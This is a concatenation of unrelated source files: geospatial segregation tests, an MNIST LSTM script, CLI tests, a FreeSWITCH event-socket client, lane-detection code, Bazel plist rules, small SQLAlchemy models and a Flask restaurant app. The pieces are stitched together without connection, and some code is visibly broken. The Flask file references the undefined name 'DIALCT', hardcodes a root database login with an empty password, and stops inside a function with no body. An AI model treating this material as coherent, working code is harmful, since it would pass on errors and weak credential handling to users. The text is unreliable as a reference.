from libpysal.examples import load_example
import geopandas as gpd
import numpy as np
from segregation.multigroup import MultiDissim
from segregation.dynamics import compute_multiscalar_profile
import quilt3
import pandana as pdna
p = quilt3.Package.browse('osm/metro_networks_8k', "s3://spatial-ucr/")
p['40900.h5'].fetch()
net = pdna.Network.from_hdf5('40900.h5')
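# The three lines above download a pre-built pandana street network from the
# spatial-ucr S3 bucket; '40900' is presumably the metro id matching the Sacramento
# example data, and the network is intended for the network-based test below.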
def test_multiscalar():
s_map = gpd.read_file(load_example("Sacramento1").get_path("sacramentot2.shp"))
df = s_map.to_crs(s_map.estimate_utm_crs())
profile = compute_multiscalar_profile(
gdf=df,
segregation_index=MultiDissim,
distances=[500, 1000, 1500, 2000],
groups=["HISP", "BLACK", "WHITE"],
)
np.testing.assert_array_almost_equal(
profile.values, [0.4246, 0.4246, 0.4173, 0.4008, 0.3776], decimal=4
)
def test_multiscalar_network():
s_map = gpd.read_file(load_example("Sacramento1").get_path("sacramentot2.shp"))
df = s_map.to_crs(s_map.estimate_utm_crs())
    profile = compute_multiscalar_profile(
        gdf=df,
        segregation_index=MultiDissim,
        distances=[500, 1000],
        groups=["HISP", "BLACK", "WHITE"],
        network=net,
    )
np.testing.assert_array_almost_equal(
profile.values, [0.4247, 0.4246, 0.4173], decimal=4
)
|
import tensorflow as tf
from tensorflow.keras.layers import LSTM, Dense
from tensorflow.keras.callbacks import TensorBoard
from TensorflowLearning.common import deal_label
n_inputs = 28  # feed one image row at a time: 28 pixels per row
max_time = 28  # each image has 28 rows (time steps)
lstm_size = 100  # number of LSTM units
n_classes = 10
batch_size = 100
(train_images, train_labels), (test_images, test_labels) = tf.keras.datasets.mnist.load_data()
train_images, test_images = (train_images / 255.0).reshape([-1, 28, 28]), (test_images / 255.0).reshape([-1, 28, 28])
train_labels, test_labels = deal_label(train_labels), deal_label(test_labels) # shape = [None, 10]
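# Note: `deal_label` comes from the external TensorflowLearning project and is not
# shown here; based on the comment above it presumably one-hot encodes the integer
# labels to shape [None, 10]. A stand-in with the same assumed behaviour would be:
#     train_labels = tf.keras.utils.to_categorical(train_labels, n_classes)
#     test_labels = tf.keras.utils.to_categorical(test_labels, n_classes)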
model = tf.keras.models.Sequential([
LSTM(units=lstm_size, batch_input_shape=[None, max_time, n_inputs]),
Dense(units=n_classes, activation='softmax'),
])
model.compile(optimizer='Adam', loss='categorical_crossentropy', metrics=['accuracy'])
callbacks = [TensorBoard(log_dir='./logs/4_1_logs')]
model.fit(train_images, train_labels, batch_size=batch_size, epochs=6, callbacks=callbacks)
score = model.evaluate(test_images, test_labels)
print(score)
|
from click.testing import CliRunner
import packtivity.cli
def test_maincli(tmpdir):
runner = CliRunner()
result = runner.invoke(
packtivity.cli.runcli,
[
"tests/testspecs/localtouchfile.yml",
"-p",
'outputfile="{workdir}/hello.txt"',
"-w",
str(tmpdir),
],
)
assert result.exit_code == 0
assert tmpdir.join("hello.txt").check()
def test_maincli_fail(tmpdir):
runner = CliRunner()
result = runner.invoke(
packtivity.cli.runcli,
[
"tests/testspecs/localtouchfail.yml",
"-p",
'outputfile="{workdir}/hello.txt"',
"-w",
str(tmpdir),
],
)
assert result.exit_code != 0
def test_maincli_async(tmpdir):
runner = CliRunner()
result = runner.invoke(
packtivity.cli.runcli,
[
"tests/testspecs/localtouchfile.yml",
"-p",
'outputfile="{workdir}/hello.txt"',
"-w",
str(tmpdir.join("workdir")),
"-b",
"foregroundasync",
"-x",
str(tmpdir.join("proxy.json")),
"--async",
],
)
assert result.exit_code == 0
assert tmpdir.join("proxy.json").check()
result = runner.invoke(packtivity.cli.checkproxy, [str(tmpdir.join("proxy.json"))])
assert result.exit_code == 0
def test_validatecli_valid(tmpdir):
runner = CliRunner()
result = runner.invoke(
packtivity.cli.validatecli, ["tests/testspecs/noop-test.yml"]
)
assert result.exit_code == 0
def test_validatecli_invalid(tmpdir):
runner = CliRunner()
result = runner.invoke(
packtivity.cli.validatecli, ["tests/testspecs/noop-test-invalid.yml"]
)
assert result.exit_code == 1
|
# Gevent imports
import gevent
from gevent.queue import Queue
import gevent.socket as socket
from gevent.event import Event
import logging
import pprint
import urllib
class NotConnectedError(Exception):
pass
class ESLEvent(object):
def __init__(self, data):
self.parse_data(data)
def parse_data(self, data):
headers = {}
data = urllib.unquote(data)
data = data.strip().split('\n')
last_key = None
value = ''
for line in data:
if ': ' in line:
key, value = line.split(': ', 1)
last_key = key
else:
key = last_key
value += '\n' + line
headers[key.strip()] = value.strip()
self.headers = headers
class InboundESL(object):
def __init__(self, host, port, password):
self.host = host
self.port = port
self.password = password
self.timeout = 5
self._run = True
self._EOL = '\n'
self._commands_sent = []
self._auth_request_event = Event()
self._receive_events_greenlet = None
self._process_events_greenlet = None
self.event_handlers = {}
self.connected = False
self._esl_event_queue = Queue()
self._process_esl_event_queue = True
def connect(self):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(self.timeout)
self.sock.connect((self.host, self.port))
self.connected = True
self.sock.settimeout(None)
self.sock_file = self.sock.makefile()
self._receive_events_greenlet = gevent.spawn(self.receive_events)
self._process_events_greenlet = gevent.spawn(self.process_events)
self._auth_request_event.wait()
self.authenticate()
def receive_events(self):
buf = ''
while self._run:
try:
data = self.sock_file.readline()
except Exception:
self._run = False
self.connected = False
self.sock.close()
# logging.exception("Error reading from socket.")
break
if not data:
if self.connected:
logging.error("Error receiving data, is FreeSWITCH running?")
self.connected = False
break
# Empty line
if data == self._EOL:
event = ESLEvent(buf)
buf = ''
self.handle_event(event)
continue
buf += data
@staticmethod
def _read_socket(sock, length):
"""Receive data from socket until the length is reached."""
data = sock.read(length)
data_length = len(data)
while data_length < length:
            logging.warning(
                'Socket should read %s bytes, but actually read %s bytes. '
                'Consider increasing "net.core.rmem_default".' %
                (length, data_length)
            )
# FIXME(italo): if not data raise error
data += sock.read(length - data_length)
data_length = len(data)
return data
def handle_event(self, event):
if event.headers['Content-Type'] == 'auth/request':
self._auth_request_event.set()
elif event.headers['Content-Type'] == 'command/reply':
async_response = self._commands_sent.pop(0)
event.data = event.headers['Reply-Text']
async_response.set(event)
elif event.headers['Content-Type'] == 'api/response':
length = int(event.headers['Content-Length'])
data = self._read_socket(self.sock_file, length)
event.data = data
async_response = self._commands_sent.pop(0)
async_response.set(event)
elif event.headers['Content-Type'] == 'text/disconnect-notice':
self.connected = False
else:
length = int(event.headers['Content-Length'])
data = self._read_socket(self.sock_file, length)
event.parse_data(data)
self._esl_event_queue.put(event)
def process_events(self):
logging.debug('Event Processor Running')
while self._run:
if not self._process_esl_event_queue:
gevent.sleep(1)
continue
try:
event = self._esl_event_queue.get(timeout=1)
except gevent.queue.Empty:
continue
if event.headers.get('Event-Name') == 'CUSTOM':
handlers = self.event_handlers.get(event.headers.get('Event-Subclass'))
else:
handlers = self.event_handlers.get(event.headers.get('Event-Name'))
if not handlers:
continue
for handle in handlers:
try:
handle(event)
                except Exception:
logging.exception(
'ESL handler %s raised exception.' %
handle.__name__)
logging.error(pprint.pformat(event.headers))
def send(self, data):
if not self.connected:
raise NotConnectedError()
async_response = gevent.event.AsyncResult()
self._commands_sent.append(async_response)
raw_msg = data + self._EOL*2
self.sock.send(raw_msg)
response = async_response.get()
return response
def authenticate(self):
response = self.send('auth %s' % self.password)
if response.headers['Reply-Text'] != '+OK accepted':
raise ValueError('Invalid password.')
def register_handle(self, name, handler):
if name not in self.event_handlers:
self.event_handlers[name] = []
if handler in self.event_handlers[name]:
return
self.event_handlers[name].append(handler)
def unregister_handle(self, name, handler):
if name not in self.event_handlers:
raise ValueError('No handlers found for event: %s' % name)
self.event_handlers[name].remove(handler)
if not self.event_handlers[name]:
del self.event_handlers[name]
def stop(self):
if self.connected:
self.send('exit')
self._run = False
logging.info("Waiting for receive greenlet exit")
self._receive_events_greenlet.join()
logging.info("Waiting for event processing greenlet exit")
self._process_events_greenlet.join()
if self.connected:
self.sock.close()
self.sock_file.close()
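# A minimal usage sketch (hypothetical host/port/password; assumes a reachable
# FreeSWITCH event socket and that the caller runs inside a gevent context):
#
#     esl = InboundESL('127.0.0.1', 8021, 'ClueCon')
#     esl.connect()
#     esl.register_handle('HEARTBEAT', lambda event: logging.info(event.headers))
#     esl.send('event plain HEARTBEAT')
#     gevent.sleep(30)
#     esl.stop()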
|
import tensorflow as tf
lstm_cell = tf.contrib.rnn.LSTMCell(
256,
state_is_tuple=False,
)
print(lstm_cell.zero_state(64, tf.float32))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Lane detection functions
'''
import math
import cv2
import numpy as np
import matplotlib.image as mpimg
from functools import partial
from moviepy.editor import VideoFileClip
def convert_colorspace(img, colorspace='grayscale'):
"""Converts RGB image to another colorspace
Args:
img (numpy.ndarray): input RGB image
colorspace (str, optional): target colorspace
Returns:
numpy.ndarray: converted image
"""
    if colorspace == 'grayscale':
        cspace_code = cv2.COLOR_RGB2GRAY
    elif colorspace == 'hsv':
        cspace_code = cv2.COLOR_RGB2HSV
    elif colorspace == 'hls':
        cspace_code = cv2.COLOR_RGB2HLS
    else:
        raise ValueError("unsupported colorspace: %s" % colorspace)
    return cv2.cvtColor(img, cspace_code)
def overlay_mask(img, vertices):
"""Applies masking on image. Only keeps the region of the image defined by the polygon
formed from `vertices`. The rest of the image is set to black.
`vertices` should be a numpy array of integer points.
Args:
img (numpy.ndarray): input image
vertices (numpy.ndarray): vertices of the mask to apply
Returns:
numpy.ndarray: resulting image
"""
# defining a blank mask to start with
mask = np.zeros_like(img)
# defining a 3 channel or 1 channel color to fill the mask with depending on the input image
if len(img.shape) > 2:
channel_count = img.shape[2] # i.e. 3 or 4 depending on your image
ignore_mask_color = (255,) * channel_count
else:
ignore_mask_color = 255
# filling pixels inside the polygon defined by "vertices" with the fill color
cv2.fillPoly(mask, vertices, ignore_mask_color)
# returning the image only where mask pixels are nonzero
masked_image = cv2.bitwise_and(img, mask)
return masked_image
def draw_lines(img, lines, color=[0, 255, 0], thickness=3):
"""Draw lines on the image inplace
Args:
img (numpy.ndarray): input image
lines (list<tuple>): lines to draw on image
color (list<int>, optional): color of lines in RGB
thickness (int, optional): thickness of lines drawn
"""
for x1, y1, x2, y2 in lines:
cv2.line(img, (x1, y1), (x2, y2), color, thickness)
def extrapolate_lines(lines, img_shape, min_slope=0.3):
"""Aggregate detectes lines into two lanes by extrapolation
Args:
lines (list<list<tuple>>): detected lines
img_shape (tuple<int>): image shape
min_slope (float, optional): minimum slope to consider the edge as being part of the lane
Returns:
list<tuple>: list of extrapolated lanes
"""
extrapolated_lines = []
# Store slopes
left_slopes, right_slopes = [], []
left_intercepts, right_intercepts = [], []
ymin = img_shape[0]
for line in lines:
for x1, y1, x2, y2 in line:
slope = (y2 - y1) / (x2 - x1)
intercept = y2 - slope * x2
# Reduce noise for outliers
if min_slope < abs(slope) < math.inf:
# Check if left lane
if slope < 0:
# Double check to avoid noise from other part of the image
if max(x1, x2) < img_shape[1] / 2:
left_slopes.append(slope)
left_intercepts.append(intercept)
else:
if min(x1, x2) > img_shape[1] / 2:
right_slopes.append(slope)
right_intercepts.append(intercept)
ymin = min(ymin, y1, y2)
if len(left_slopes) > 0:
# Average slope and intercept
left_slope = sum(left_slopes) / len(left_slopes)
left_intercept = sum(left_intercepts) / len(left_intercepts)
# Add the extrapolated lane
left = (int((img_shape[0] - left_intercept) / left_slope), img_shape[0],
int((ymin - left_intercept) / left_slope), int(ymin))
extrapolated_lines.append(left)
if len(right_slopes) > 0:
right_slope = sum(right_slopes) / len(right_slopes)
right_intercept = sum(right_intercepts) / len(right_intercepts)
right = (int((img_shape[0] - right_intercept) / right_slope), img_shape[0],
int((ymin - right_intercept) / right_slope), int(ymin))
extrapolated_lines.append(right)
return extrapolated_lines
def hough_lines(img, rho=2, theta=np.pi / 180, threshold=20, min_line_len=5, max_line_gap=25, thickness=3):
"""Perform a Hough transform on img
Args:
img (numpy.ndarray): input image
rho (float, optional): distance resolution in pixels of the Hough grid
theta (float, optional): angular resolution in radians of the Hough grid
threshold (float, optional): minimum number of votes (intersections in Hough grid cell)
min_line_len (int, optional): minimum number of pixels making up a line
max_line_gap (int, optional): maximum gap in pixels between connectable line segments
thickness (int, optional): thickness of lines drawn on resulting image
Returns:
numpy.ndarray: result image
"""
# Hough transform
lines = cv2.HoughLinesP(img, rho, theta, threshold, np.array([]),
minLineLength=min_line_len, maxLineGap=max_line_gap)
    line_img = np.zeros((img.shape[0], img.shape[1], 3), dtype=np.uint8)
    if lines is None:
        # No segments detected: return an empty (black) overlay
        return line_img
    # Line extrapolation
    extrapolated_lines = extrapolate_lines(lines, line_img.shape)
# Image display
draw_lines(line_img, extrapolated_lines, thickness=thickness)
return line_img
def weighted_img(img1, img2, α=0.8, β=1., γ=0.):
"""Interpolate two images into a single one by applying
    α * img2 + β * img1 + γ
Args:
img1 (numpy.ndarray[H, W, C]): first image
img2 (numpy.ndarray[H, W, C]): second image
α (float, optional): weight of first image
β (float, optional): weight of second image
γ (float, optional): offset
Returns:
numpy.ndarray: resulting image
"""
return cv2.addWeighted(img2, α, img1, β, γ)
def get_depth_vertices(img_shape, lat_offset=0.08, horizon=(0.55, 0.5), vert_range=(0.62, 0.9)):
"""Compute depth view vertices
Args:
img_shape (tuple<int>): shape of the input image
lat_offset (float, optional): relative lateral offset of the bottom of the mask
horizon (tuple<float>, optional): relative coordinates of apparent horizon
vert_range (tuple<float>, optional): relative range of vertical masking
Returns:
numpy.ndarray: vertices of depth view mask
"""
# Compute cut coordinates
leftcut_min = lat_offset + (1 - vert_range[0]) / (1 - horizon[0]) * (horizon[1] - lat_offset)
leftcut_max = lat_offset + (1 - vert_range[1]) / (1 - horizon[0]) * (horizon[1] - lat_offset)
vertices = np.array([[
(leftcut_max * img_shape[1], vert_range[1] * img_shape[0]),
(leftcut_min * img_shape[1], vert_range[0] * img_shape[0]),
((1 - leftcut_min) * img_shape[1], vert_range[0] * img_shape[0]),
((1 - leftcut_max) * img_shape[1], vert_range[1] * img_shape[0])]], dtype=np.int32)
return vertices
def _process_image(img, colorspace='hsv', thickness=3, canny_low=50, canny_high=150):
"""Compute the lane mask of an input image and overlay it on input image
Args:
img (numpy.ndarray[H, W, C]): input image
colorspace (str, optional): colorspace to use for canny edge detection
thickness (int, optional): thickness of lines on result image
canny_low (int, optional): lower threshold for canny edge detection
canny_high (int, optional): upper threshold for canny edge detection
Returns:
numpy.ndarray[H, W, 3]: lane mask
"""
# Grayscale conversion
cspace_img = convert_colorspace(img, colorspace)
# Gaussian smoothing
smooth_img = cv2.GaussianBlur(cspace_img, (3, 3), 0)
# Colorspace masking
if colorspace == 'hsv':
yellow_low = np.array([0, 100, 100])
yellow_high = np.array([50, 255, 255])
white_low = np.array([20, 0, 180])
white_high = np.array([255, 80, 255])
yellow_mask = cv2.inRange(smooth_img, yellow_low, yellow_high)
white_mask = cv2.inRange(smooth_img, white_low, white_high)
smooth_img = cv2.bitwise_or(yellow_mask, white_mask)
# Canny edge detection
canny_img = cv2.Canny(smooth_img, canny_low, canny_high)
# Apply depth view masking
vertices = get_depth_vertices(img.shape)
masked_edges = overlay_mask(canny_img, vertices)
# Run Hough on edge detected image
# Output "lines" is an array containing endpoints of detected line segments
lane_img = hough_lines(masked_edges, thickness=thickness)
# Overlay result on input image
return weighted_img(img, lane_img)
def process_image(img_path, thickness=3):
"""Read image and detect lanes on it
Args:
img_path (str): input image path
thickness (int, optional): thickness of lines on result image
Returns:
numpy.ndarray[H, W, 3]: input image overlayed with result
"""
img = mpimg.imread(img_path)
return _process_image(img, thickness=thickness)
def process_video(video_path, output_file, thickness=3, write_gif=False):
"""Display lane detection results on input image
Args:
video_path (str): input video path
output_file (str): output video path
thickness (int, optional): thickness of lines on result image
write_gif (bool, optional): should the output be a GIF rather than a video
"""
video = VideoFileClip(video_path)
clip = video.fl_image(partial(_process_image, thickness=thickness))
if write_gif:
file_split = output_file.split('.')
if file_split[-1] != 'gif':
output_file = '.'.join(file_split[:-1] + ['gif'])
clip.write_gif(output_file, fps=5, program='ImageMagick')
else:
clip.write_videofile(output_file, audio=False)
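# A minimal usage sketch (hypothetical input/output paths):
#
#     annotated = process_image('test_images/solidWhiteRight.jpg')
#     process_video('test_videos/solidWhiteRight.mp4',
#                   'test_videos_output/solidWhiteRight.mp4')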
|
# Copyright 2018 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Plist related actions."""
load(
"@build_bazel_apple_support//lib:apple_support.bzl",
"apple_support",
)
load(
"@build_bazel_rules_apple//apple/internal:intermediates.bzl",
"intermediates",
)
load(
"@build_bazel_rules_apple//apple/internal:platform_support.bzl",
"platform_support",
)
load(
"@build_bazel_rules_apple//apple:providers.bzl",
"AppleBundleVersionInfo",
)
load(
"@bazel_skylib//lib:paths.bzl",
"paths",
)
load(
"@bazel_skylib//lib:shell.bzl",
"shell",
)
def plisttool_action(
*,
actions,
control_file,
inputs,
mnemonic = None,
outputs,
platform_prerequisites,
resolved_plisttool):
"""Registers an action that invokes `plisttool`.
This function is a low-level helper that simply invokes `plisttool` with the given arguments.
It is intended to be called by other functions that register actions for more specific
resources, like Info.plist files or entitlements.
Args:
actions: The actions provider from `ctx.actions`.
control_file: The `File` containing the control struct to be passed to plisttool.
inputs: Any `File`s that should be treated as inputs to the underlying action.
mnemonic: The mnemonic to display when the action executes. Defaults to None.
outputs: Any `File`s that should be treated as outputs of the underlying action.
platform_prerequisites: Struct containing information on the platform being targeted.
resolved_plisttool: A struct referencing the resolved plist tool.
"""
apple_support.run(
actions = actions,
apple_fragment = platform_prerequisites.apple_fragment,
arguments = [control_file.path],
executable = resolved_plisttool.executable,
inputs = depset(inputs + [control_file], transitive = [resolved_plisttool.inputs]),
input_manifests = resolved_plisttool.input_manifests,
mnemonic = mnemonic,
outputs = outputs,
xcode_config = platform_prerequisites.xcode_version_config,
xcode_path_wrapper = platform_prerequisites.xcode_path_wrapper,
)
def compile_plist(*, actions, input_file, output_file, platform_prerequisites):
"""Creates an action that compiles plist and strings files.
Args:
actions: The actions provider from `ctx.actions`.
input_file: The property list file that should be converted.
output_file: The file reference for the output plist.
platform_prerequisites: Struct containing information on the platform being targeted.
"""
if input_file.basename.endswith(".strings"):
mnemonic = "CompileStrings"
else:
mnemonic = "CompilePlist"
    # This command will check whether the input file is non-empty, and then
    # execute the version of plutil that takes the file directly. If the file is
    # empty, it will echo a newline and pipe that into plutil. We do this
    # to handle empty files, since plutil doesn't handle them very well.
plutil_command = "plutil -convert binary1 -o %s --" % shell.quote(output_file.path)
complete_command = ("if [[ -s {in_file} ]] ; then {plutil_command} {in_file} ; " +
"elif [[ -f {in_file} ]] ; then echo | {plutil_command} - ; " +
"else exit 1 ; " +
"fi").format(
in_file = shell.quote(input_file.path),
plutil_command = plutil_command,
)
apple_support.run_shell(
actions = actions,
apple_fragment = platform_prerequisites.apple_fragment,
command = complete_command,
inputs = [input_file],
mnemonic = mnemonic,
outputs = [output_file],
xcode_config = platform_prerequisites.xcode_version_config,
)
def merge_resource_infoplists(
*,
actions,
bundle_name_with_extension,
input_files,
output_plist,
platform_prerequisites,
resolved_plisttool,
rule_label):
"""Merges a list of plist files for resource bundles with substitutions.
Args:
actions: The actions provider from `ctx.actions`.
bundle_name_with_extension: The full name of the bundle where the plist will be placed.
input_files: The list of plists to merge.
output_plist: The file reference for the output plist.
platform_prerequisites: Struct containing information on the platform being targeted.
resolved_plisttool: A struct referencing the resolved plist tool.
rule_label: The label of the target being analyzed.
"""
product_name = paths.replace_extension(bundle_name_with_extension, "")
substitutions = {
"BUNDLE_NAME": bundle_name_with_extension,
"PRODUCT_NAME": product_name,
"TARGET_NAME": product_name,
}
# The generated Info.plists from Xcode's project templates use
# DEVELOPMENT_LANGUAGE as the default variable substitution for
# CFBundleDevelopmentRegion. We substitute this to `en` to support
# Info.plists out of the box coming from Xcode.
substitutions["DEVELOPMENT_LANGUAGE"] = "en"
target = '%s (while bundling under "%s")' % (bundle_name_with_extension, str(rule_label))
control = struct(
binary = True,
output = output_plist.path,
plists = [p.path for p in input_files],
target = target,
variable_substitutions = struct(**substitutions),
)
control_file = intermediates.file(
actions,
rule_label.name,
paths.join(bundle_name_with_extension, "%s-control" % output_plist.basename),
)
actions.write(
output = control_file,
content = control.to_json(),
)
plisttool_action(
actions = actions,
control_file = control_file,
inputs = input_files,
mnemonic = "CompileInfoPlist",
outputs = [output_plist],
platform_prerequisites = platform_prerequisites,
resolved_plisttool = resolved_plisttool,
)
def merge_root_infoplists(
*,
actions,
bundle_name,
bundle_id = None,
bundle_extension,
executable_name,
child_plists = [],
child_required_values = [],
environment_plist,
include_executable_name = True,
input_plists,
launch_storyboard,
output_plist,
output_pkginfo,
platform_prerequisites,
resolved_plisttool,
rule_descriptor,
rule_label,
version,
version_keys_required = False):
"""Creates an action that merges Info.plists and converts them to binary.
This action merges multiple plists by shelling out to plisttool, then
compiles the final result into a single binary plist file.
Args:
actions: The actions provider from `ctx.actions`.
bundle_name: The name of the output bundle.
bundle_id: The bundle identifier to set in the output plist.
bundle_extension: The extension for the bundle.
executable_name: The name of the output executable.
child_plists: A list of plists from child targets (such as extensions
or Watch apps) whose bundle IDs and version strings should be
validated against the compiled plist for consistency.
child_required_values: A list of pairs containing a client target plist
and the pairs to check. For more information on the second item in the
pair, see plisttool's `child_plist_required_values`, as this is passed
straight through to it.
environment_plist: An executable file referencing the environment_plist tool.
include_executable_name: If True, the executable name will be added to
the plist in the `CFBundleExecutable` key. This is mainly intended for
plists embedded in a command line tool which don't need this value.
input_plists: The root plist files to merge.
launch_storyboard: A file to be used as a launch screen for the application.
output_pkginfo: The file reference for the PkgInfo file. Can be None if not
required.
output_plist: The file reference for the merged output plist.
platform_prerequisites: Struct containing information on the platform being targeted.
resolved_plisttool: A struct referencing the resolved plist tool.
rule_descriptor: A rule descriptor for platform and product types from the rule context.
rule_label: The label of the target being analyzed.
version: A label referencing AppleBundleVersionInfo, if provided by the rule.
version_keys_required: If True, the merged Info.plist file must include
entries for CFBundleShortVersionString and CFBundleVersion.
"""
input_files = list(input_plists + child_plists)
# plists and forced_plists are lists of plist representations that should be
# merged into the final Info.plist. Values in plists will be validated to be
# unique, while values in forced_plists are forced into the final Info.plist,
# without validation. Each array can contain either a path to a plist file to
# merge, or a struct that represents the values of the plist to merge.
plists = [p.path for p in input_plists]
forced_plists = []
# plisttool options for merging the Info.plist file.
info_plist_options = {}
bundle_name_with_extension = bundle_name + bundle_extension
product_name = paths.replace_extension(bundle_name_with_extension, "")
# Values for string replacement substitutions to perform in the merged
# Info.plist
substitutions = {
"BUNDLE_NAME": bundle_name_with_extension,
"PRODUCT_NAME": product_name,
}
# The default in Xcode is for PRODUCT_NAME and TARGET_NAME to be the same.
# Support TARGET_NAME for substitutions even though it might not be the
# target name in the BUILD file.
substitutions["TARGET_NAME"] = product_name
# The generated Info.plists from Xcode's project templates use
# DEVELOPMENT_LANGUAGE as the default variable substitution for
# CFBundleDevelopmentRegion. We substitute this to `en` to support
# Info.plists out of the box coming from Xcode.
substitutions["DEVELOPMENT_LANGUAGE"] = "en"
if include_executable_name and executable_name:
substitutions["EXECUTABLE_NAME"] = executable_name
forced_plists.append(struct(CFBundleExecutable = executable_name))
if bundle_id:
substitutions["PRODUCT_BUNDLE_IDENTIFIER"] = bundle_id
# Pass the bundle_id as a plist and not a force_plist, this way the
# merging will validate that any existing value matches. Historically
# mismatches between the input Info.plist and rules bundle_id have
# been valid bugs, so this will still catch that.
plists.append(struct(CFBundleIdentifier = bundle_id))
if child_plists:
info_plist_options["child_plists"] = struct(
**{str(p.owner): p.path for p in child_plists}
)
if child_required_values:
info_plist_options["child_plist_required_values"] = struct(
**{str(p.owner): v for (p, v) in child_required_values}
)
if (version != None and AppleBundleVersionInfo in version):
version_info = version[AppleBundleVersionInfo]
input_files.append(version_info.version_file)
info_plist_options["version_file"] = version_info.version_file.path
if version_keys_required:
info_plist_options["version_keys_required"] = True
# Keys to be forced into the Info.plist file.
# b/67853874 - move this to the right platform specific rule(s).
if launch_storyboard:
short_name = paths.split_extension(launch_storyboard.basename)[0]
forced_plists.append(struct(UILaunchStoryboardName = short_name))
# Add any UIDeviceFamily entry needed.
families = platform_support.ui_device_family_plist_value(
platform_prerequisites = platform_prerequisites,
)
if families:
forced_plists.append(struct(UIDeviceFamily = families))
# Collect any values for special product types that we have to manually put
# in (duplicating what Xcode apparently does under the hood).
if rule_descriptor.additional_infoplist_values:
forced_plists.append(
struct(**rule_descriptor.additional_infoplist_values),
)
# Replace PRODUCT_BUNDLE_PACKAGE_TYPE based on info in rule descriptor
if rule_descriptor.bundle_package_type:
substitutions["PRODUCT_BUNDLE_PACKAGE_TYPE"] = rule_descriptor.bundle_package_type
if platform_prerequisites.platform_type == apple_common.platform_type.macos:
plist_key = "LSMinimumSystemVersion"
else:
plist_key = "MinimumOSVersion"
input_files.append(environment_plist)
platform = platform_prerequisites.platform
sdk_version = platform_prerequisites.sdk_version
platform_with_version = platform.name_in_plist.lower() + str(sdk_version)
forced_plists.extend([
environment_plist.path,
struct(
CFBundleSupportedPlatforms = [platform.name_in_plist],
DTPlatformName = platform.name_in_plist.lower(),
DTSDKName = platform_with_version,
**{plist_key: platform_prerequisites.minimum_os}
),
])
output_files = [output_plist]
if output_pkginfo:
info_plist_options["pkginfo"] = output_pkginfo.path
output_files.append(output_pkginfo)
control = struct(
binary = rule_descriptor.binary_infoplist,
forced_plists = forced_plists,
info_plist_options = struct(**info_plist_options),
output = output_plist.path,
plists = plists,
target = str(rule_label),
variable_substitutions = struct(**substitutions),
)
control_file = intermediates.file(
actions,
rule_label.name,
"%s-root-control" % output_plist.basename,
)
actions.write(
output = control_file,
content = control.to_json(),
)
plisttool_action(
actions = actions,
control_file = control_file,
inputs = input_files,
mnemonic = "CompileRootInfoPlist",
outputs = output_files,
platform_prerequisites = platform_prerequisites,
resolved_plisttool = resolved_plisttool,
)
|
# Program that, given a measurement in meters, converts it to: km, hm, dam, dm, cm, mm
try:
    medida = float(input("Enter the measurement in meters: "))
    print(f"In km: {medida/1000}km")
    print(f"In hm: {medida/100}hm")
    print(f"In dam: {medida/10}dam")
    print(f"In dm: {medida*10}dm")
    print(f"In cm: {medida*100}cm")
    print(f"In mm: {medida*1000}mm")
except Exception as erro:
    print(f"An error occurred! Please try again. Error type: {erro.__class__}")
|
# The server lives in an external module so that features can be added when needed.
from lib.server import hcX
if __name__ == '__main__':
# run the server..
hcX.main()
|
import uuid
from sqlalchemy import Column, DateTime, ForeignKey, String, UniqueConstraint, func
from sqlalchemy.orm import backref, relationship
from quetz.db_models import UUID, Base
class TermsOfService(Base):
__tablename__ = 'quetz_tos'
id = Column(UUID, primary_key=True, default=lambda: uuid.uuid4().bytes)
uploader_id = Column(UUID)
filename = Column(String)
time_created = Column(DateTime, nullable=False, server_default=func.now())
class TermsOfServiceSignatures(Base):
__tablename__ = "quetz_tos_signatures"
__table_args__ = (UniqueConstraint('tos_id', 'user_id'),)
tos_id = Column(UUID, ForeignKey('quetz_tos.id'), primary_key=True)
user_id = Column(UUID, ForeignKey('users.id'), primary_key=True)
time_created = Column(DateTime, nullable=False, server_default=func.now())
tos = relationship(
"TermsOfService",
backref=backref(
"tos",
uselist=False,
cascade="delete,all",
),
)
|
from sqlalchemy import Column, Integer, String, Boolean
from common.base import Base
class Tile(Base):
__tablename__ = 'tile'
id = Column(Integer, primary_key=True)
name = Column(String)
display_emoji = Column(String)
interactive = Column(Boolean, default=False)
traversable = Column(Boolean, default=True)
hunger_drain_amount = Column(Integer, default=0)
thirst_drain_amount = Column(Integer, default=0)
can_chop = Column(Boolean, default=False)
can_mine = Column(Boolean, default=False)
can_hunt = Column(Boolean, default=False)
can_forage = Column(Boolean, default=False)
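# A minimal usage sketch (assumes an engine and Session configured elsewhere for
# the shared `Base`):
#
#     grass = Tile(name='grass', display_emoji='🌿', can_forage=True)
#     session.add(grass)
#     session.commit()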
|
from flask import Flask, render_template, request, redirect, url_for, flash, jsonify
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from database_setup import Base, Restaurant, MenuItem
app = Flask(__name__)
# engine = create_engine('sqlite:///restaurantmenu.db?check_same_thread=False')
DIALECT = "mysql"
DRIVER = "pymysql"
USERNAME = "root"
PASSWORD = ""
HOST = "127.0.0.1"
PORT = "3306"
DATABASE = "test"
DB_URI="{}+{}://{}:{}@{}:{}/{}?charset=utf8".format(DIALCT,DRIVER,USERNAME,PASSWORD,HOST,PORT,DATABASE)
engine = create_engine(DB_URI)
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
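# Note: Restaurant and MenuItem come from database_setup.py (not shown here); the
# JSON endpoints below assume MenuItem exposes a `serialize` property returning a
# dict representation of the row.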
@app.route('/restaurants/<int:restaurant_id>/menu/JSON')
def restaurantMenu_JSON(restaurant_id):
restaurant = session.query(Restaurant).filter_by(id=restaurant_id).one()
items = session.query(MenuItem).filter_by(restaurant_id=restaurant_id).all()
return jsonify(MenuItems=[i.serialize for i in items])
@app.route('/restaurants/<int:restaurant_id>/menu/<int:menu_id>/JSON')
def Menu_Item_JSON(restaurant_id, menu_id):
items = session.query(MenuItem).filter_by(id=menu_id).one()
return jsonify(MenuItems=items.serialize)
@app.route('/')
@app.route('/restaurants/<int:restaurant_id>/menu')
def restaurantMenu(restaurant_id=None):
